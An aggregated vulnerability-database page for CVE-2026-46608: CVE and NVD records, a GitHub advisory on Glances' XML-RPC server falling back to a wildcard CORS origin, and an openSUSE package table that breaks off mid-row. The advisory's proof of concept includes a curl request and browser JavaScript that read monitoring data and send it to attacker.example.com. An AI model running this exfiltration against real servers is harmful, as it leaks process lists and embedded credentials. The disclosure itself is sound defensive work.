CVE-2026-46608 (GCVE-0-2026-46608)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:05 – Updated: 2026-06-26 18:42

| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46608",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T17:50:40.059541Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-26T18:42:27.698Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-183",
"description": "CWE-183: Permissive List of Allowed Inputs",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-942",
"description": "CWE-942: Permissive Cross-domain Policy with Untrusted Domains",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:05:48.123Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-87qc-fj39-wccr",
"discovery": "UNKNOWN"
},
"title": "Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46608",
"datePublished": "2026-06-25T18:05:48.123Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-26T18:42:27.698Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46608",
"date": "2026-06-26",
"epss": "0.00401",
"percentile": "0.31899"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46608\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-26T17:50:40.059541Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-26T17:50:41.245Z\"}}], \"cna\": {\"title\": \"Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)\", \"source\": {\"advisory\": \"GHSA-87qc-fj39-wccr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. 
Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-183\", \"description\": \"CWE-183: Permissive List of Allowed Inputs\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-942\", \"description\": \"CWE-942: Permissive Cross-domain Policy with Untrusted Domains\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:05:48.123Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46608\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-26T18:42:27.698Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:05:48.123Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46608
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-26 19:16

| Vendor | Product | Version |
|---|---|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46608",
"lastModified": "2026-06-26T19:16:40.757",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46608",
"options": [
{
"exploitation": "none"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T17:50:40.059541Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.663",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-183"
},
{
"lang": "en",
"value": "CWE-942"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-87QC-FJ39-WCCR
Vulnerability from github – Published: 2026-06-22 21:27 – Updated: 2026-06-22 21:27

Summary
The Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard — the same exposure that the original CVE described. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim's knowledge.
Details
Affected file: glances/server.py, class GlancesXMLRPCServer, line 113
Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py#L113
# server.py (GlancesXMLRPCServer.__init__)
cors_origins = self.args.cors_origins # list from config / CLI
# Line 113 — the incomplete fix:
self.cors_origin = cors_origins[0] if len(cors_origins) == 1 else '*'
# ^^^
# Any allowlist with 2+ entries collapses to the wildcard
The cors_origin value is then echoed back as the Access-Control-Allow-Origin response header for every request (line ~147 in the same file):
self.send_header('Access-Control-Allow-Origin', self.cors_origin)
This means the CORS header is determined once at server startup and never compared against the actual Origin header sent by the browser. Even if an operator sets:
# glances.conf
[outputs]
cors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com
the server responds with Access-Control-Allow-Origin: * to every request, including those from https://attacker.example.com.
Single-origin wildcard (the default, cors_origins = *) is also still in effect; the fix only helps if exactly one non-wildcard origin is configured.
Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).
Test results:
| Origin sent | ACAO header returned | Expected |
|---|---|---|
| http://evil.example.com | * | No header |
| https://dashboard.corp | * | Reflected |
| https://grafana.corp | * | Reflected |
PoC
Special configuration required
The multi-origin collapse is only triggered when cors_origins contains two or more entries. Create the following glances.conf:
# /tmp/glances_multiorigin.conf
[global]
check_update = false
[outputs]
cors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com
Step 1 — Start the XML-RPC server using the config above
glances -s -p 61209 -C /tmp/glances_multiorigin.conf
Step 2 — Send a CORS simple request from a foreign origin
curl -s -D - -X POST "http://TARGET_HOST:61209/RPC2" \
-H "Content-Type: text/plain" \
-H "Origin: http://evil.example.com" \
-d '<?xml version="1.0"?>
<methodCall><methodName>getAllPlugins</methodName></methodCall>'
Expected (secure) response:
HTTP/1.0 400 Bad Request
or no Access-Control-Allow-Origin header.
Actual response:
HTTP/1.0 200 OK
Access-Control-Allow-Origin: *
...
<?xml version='1.0'?>
<methodResponse>
<params><param><value><array><data>
<value><string>cpu</string></value>
<value><string>mem</string></value>
...
</data></array></value></param></params>
</methodResponse>
Step 3 — Demonstrate the code-level collapse to wildcard
import sys
sys.path.insert(0, '/path/to/glances') # adjust to local clone
from glances.config import Config
c = Config('/tmp/glances_multiorigin.conf')
cors_list = c.get_list_value('outputs', 'cors_origins', default=['*'])
# Reproduces server.py line 113:
result = cors_list[0] if len(cors_list) == 1 else '*'
print('cors_origins config :', cors_list)
print('cors_origin applied :', result)
print('Is wildcard? :', result == '*')
# cors_origins config : ['https://dashboard.corp.example.com', 'https://grafana.corp.example.com']
# cors_origin applied : *
# Is wildcard? : True
Browser-based exploitation
Once the wildcard is confirmed, the original CVE-2026-33533 attack vector still applies in full. A malicious page served to a victim whose browser can reach the Glances server can exfiltrate data as follows:
// Runs in a page on http://evil.example.com
const payload = `<?xml version="1.0"?>
<methodCall><methodName>getAll</methodName></methodCall>`;
fetch('http://GLANCES_HOST:61209/RPC2', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: payload,
})
.then(r => r.text())
.then(data => {
// 'data' contains hostname, OS, full process list, network interfaces, etc.
fetch('https://attacker.example.com/collect?d=' + btoa(data));
});
This works as a CORS "simple request" (POST + text/plain) — no CORS preflight is triggered and the * wildcard allows the browser to read the response.
Impact
Vulnerability type: CORS Misconfiguration / Bypass of CVE-2026-33533 mitigation (CWE-942)
Who is impacted: Any operator who:
1. Runs Glances in XML-RPC server mode (glances -s), and
2. Has configured two or more cors_origins entries in glances.conf believing they are restricting browser access.
Operators using the default single-wildcard configuration (cors_origins = *, which is the upstream default) remain affected by the original CVE-2026-33533 exposure (unrestricted cross-origin read). The incomplete fix addresses only the narrow case of a single non-wildcard origin.
Data exposed through the XML-RPC API includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, passwords, and tokens), CPU/memory/disk/network statistics, listening ports, and Docker/Kubernetes container metadata.
Impact:
- Confidentiality: High — complete system monitoring data readable by any browser page.
- Integrity: None — read-only API.
- Availability: None — no denial-of-service component.
Suggested Fix
Implement per-request origin reflection against the configured allowlist, as recommended by the W3C CORS specification and as done by modern CORS middleware (e.g. Starlette's CORSMiddleware):
# server.py — replace the single static self.cors_origin field with:
def _get_acao_header(self, request_origin: str) -> str | None:
"""Return the correct Access-Control-Allow-Origin value or None."""
if not self.cors_origins or '*' in self.cors_origins:
return '*'
if request_origin in self.cors_origins:
return request_origin
return None # do not send the header for unlisted origins
# In do_POST / send_response:
origin = self.headers.get('Origin', '')
acao = self._get_acao_header(origin)
if acao:
self.send_header('Access-Control-Allow-Origin', acao)
self.send_header('Vary', 'Origin')
Additionally, consider retiring the legacy XML-RPC server in favour of the REST API (glances -w), which uses Starlette's CORSMiddleware correctly, and document the deprecation path.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46608"
],
"database_specific": {
"cwe_ids": [
"CWE-183",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:27:24Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe Glances XML-RPC server (`glances -s`) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE 2026-33533. However, the implementation silently falls back to `Access-Control-Allow-Origin: *` whenever `cors_origins` contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard \u2014 the same exposure that the original CVE described. A malicious web page served from any origin can issue a CORS simple request to `/RPC2` and read the full system monitoring dataset without the victim\u0027s knowledge.\n\n---\n\n### Details\n\n**Affected file:** `glances/server.py`, class `GlancesXMLRPCServer`, line 113\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py#L113\n\n```python\n# server.py (GlancesXMLRPCServer.__init__)\ncors_origins = self.args.cors_origins # list from config / CLI\n\n# Line 113 \u2014 the incomplete fix:\nself.cors_origin = cors_origins[0] if len(cors_origins) == 1 else \u0027*\u0027\n# ^^^\n# Any allowlist with 2+ entries collapses to the wildcard\n```\n\nThe `cors_origin` value is then echoed back as the `Access-Control-Allow-Origin` response header for every request (line ~147 in the same file):\n\n```python\nself.send_header(\u0027Access-Control-Allow-Origin\u0027, self.cors_origin)\n```\n\nThis means the CORS header is determined once at server startup and never compared against the actual `Origin` header sent by the browser. 
Even if an operator sets:\n\n```ini\n# glances.conf\n[outputs]\ncors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com\n```\n\nthe server responds with `Access-Control-Allow-Origin: *` to every request, including those from `https://attacker.example.com`.\n\n**Single-origin wildcard** (the default, `cors_origins = *`) is also still in effect; the fix only helps if exactly one non-wildcard origin is configured.\n\n**Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).\n\nTest results:\n\n| Origin sent | ACAO header returned | Expected |\n|--------------------------|----------------------|--------------|\n| `http://evil.example.com`| `*` | No header |\n| `https://dashboard.corp` | `*` | Reflected |\n| `https://grafana.corp` | `*` | Reflected |\n\n---\n\n### PoC\n\n**Special configuration required**\n\nThe multi-origin collapse is only triggered when `cors_origins` contains two or more entries. Create the following `glances.conf`:\n\n```ini\n# /tmp/glances_multiorigin.conf\n[global]\ncheck_update = false\n\n[outputs]\ncors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com\n```\n\n**Step 1 \u2014 Start the XML-RPC server using the config above**\n\n```bash\nglances -s -p 61209 -C /tmp/glances_multiorigin.conf\n```\n\n**Step 2 \u2014 Send a CORS simple request from a foreign origin**\n\n```bash\ncurl -s -D - -X POST \"http://TARGET_HOST:61209/RPC2\" \\\n -H \"Content-Type: text/plain\" \\\n -H \"Origin: http://evil.example.com\" \\\n -d \u0027\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAllPlugins\u003c/methodName\u003e\u003c/methodCall\u003e\u0027\n```\n\n**Expected (secure) response:**\n\n```\nHTTP/1.0 400 Bad Request\n```\n\nor no `Access-Control-Allow-Origin` header.\n\n**Actual response:**\n\n```\nHTTP/1.0 200 OK\nAccess-Control-Allow-Origin: *\n...\n\u003c?xml 
version=\u00271.0\u0027?\u003e\n\u003cmethodResponse\u003e\n \u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003carray\u003e\u003cdata\u003e\n \u003cvalue\u003e\u003cstring\u003ecpu\u003c/string\u003e\u003c/value\u003e\n \u003cvalue\u003e\u003cstring\u003emem\u003c/string\u003e\u003c/value\u003e\n ...\n \u003c/data\u003e\u003c/array\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\n\u003c/methodResponse\u003e\n```\n\n**Step 3 \u2014 Demonstrate the code-level collapse to wildcard**\n\n```python\nimport sys\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\nfrom glances.config import Config\n\nc = Config(\u0027/tmp/glances_multiorigin.conf\u0027)\ncors_list = c.get_list_value(\u0027outputs\u0027, \u0027cors_origins\u0027, default=[\u0027*\u0027])\n# Reproduces server.py line 113:\nresult = cors_list[0] if len(cors_list) == 1 else \u0027*\u0027\n\nprint(\u0027cors_origins config :\u0027, cors_list)\nprint(\u0027cors_origin applied :\u0027, result)\nprint(\u0027Is wildcard? :\u0027, result == \u0027*\u0027)\n# cors_origins config : [\u0027https://dashboard.corp.example.com\u0027, \u0027https://grafana.corp.example.com\u0027]\n# cors_origin applied : *\n# Is wildcard? : True\n```\n\n**Browser-based exploitation**\n\nOnce the wildcard is confirmed, the original CVE-2026-33533 attack vector still applies in full. 
A malicious page served to a victim whose browser can reach the Glances server can exfiltrate data as follows:\n\n```javascript\n// Runs in a page on http://evil.example.com\nconst payload = `\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAll\u003c/methodName\u003e\u003c/methodCall\u003e`;\n\nfetch(\u0027http://GLANCES_HOST:61209/RPC2\u0027, {\n method: \u0027POST\u0027,\n headers: { \u0027Content-Type\u0027: \u0027text/plain\u0027 },\n body: payload,\n})\n.then(r =\u003e r.text())\n.then(data =\u003e {\n // \u0027data\u0027 contains hostname, OS, full process list, network interfaces, etc.\n fetch(\u0027https://attacker.example.com/collect?d=\u0027 + btoa(data));\n});\n```\n\nThis works as a CORS \"simple request\" (POST + `text/plain`) \u2014 no CORS preflight is triggered and the `*` wildcard allows the browser to read the response.\n\n---\n\n### Impact\n\n**Vulnerability type:** CORS Misconfiguration / Bypass of CVE-2026-33533 mitigation (CWE-942)\n\n**Who is impacted:** Any operator who:\n1. Runs Glances in XML-RPC server mode (`glances -s`), *and*\n2. Has configured two or more `cors_origins` entries in `glances.conf` believing\n they are restricting browser access.\n\nOperators using the default single-wildcard configuration (`cors_origins = *`, which is the upstream default) remain affected by the original CVE-2026-33533 exposure (unrestricted cross-origin read). 
The incomplete fix addresses only the narrow case of a single non-wildcard origin.\n\n**Data exposed through the XML-RPC API** includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, passwords, and tokens), CPU/memory/disk/network statistics, listening ports, and Docker/Kubernetes container metadata.\n\n**Impact:**\n- **Confidentiality:** High \u2014 complete system monitoring data readable by any browser page.\n- **Integrity:** None \u2014 read-only API.\n- **Availability:** None \u2014 no denial-of-service component.\n\n---\n\n### Suggested Fix\n\nImplement per-request origin reflection against the configured allowlist, as recommended by the W3C CORS specification and as done by modern CORS middleware (e.g. Starlette\u0027s `CORSMiddleware`):\n\n```python\n# server.py \u2014 replace the single static self.cors_origin field with:\n\ndef _get_acao_header(self, request_origin: str) -\u003e str | None:\n \"\"\"Return the correct Access-Control-Allow-Origin value or None.\"\"\"\n if not self.cors_origins or \u0027*\u0027 in self.cors_origins:\n return \u0027*\u0027\n if request_origin in self.cors_origins:\n return request_origin\n return None # do not send the header for unlisted origins\n\n# In do_POST / send_response:\norigin = self.headers.get(\u0027Origin\u0027, \u0027\u0027)\nacao = self._get_acao_header(origin)\nif acao:\n self.send_header(\u0027Access-Control-Allow-Origin\u0027, acao)\n self.send_header(\u0027Vary\u0027, \u0027Origin\u0027)\n```\n\nAdditionally, consider retiring the legacy XML-RPC server in favour of the REST API (`glances -w`), which uses Starlette\u0027s `CORSMiddleware` correctly, and document the deprecation path.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. 
The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-87qc-fj39-wccr",
"modified": "2026-06-22T21:27:24Z",
"published": "2026-06-22T21:27:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
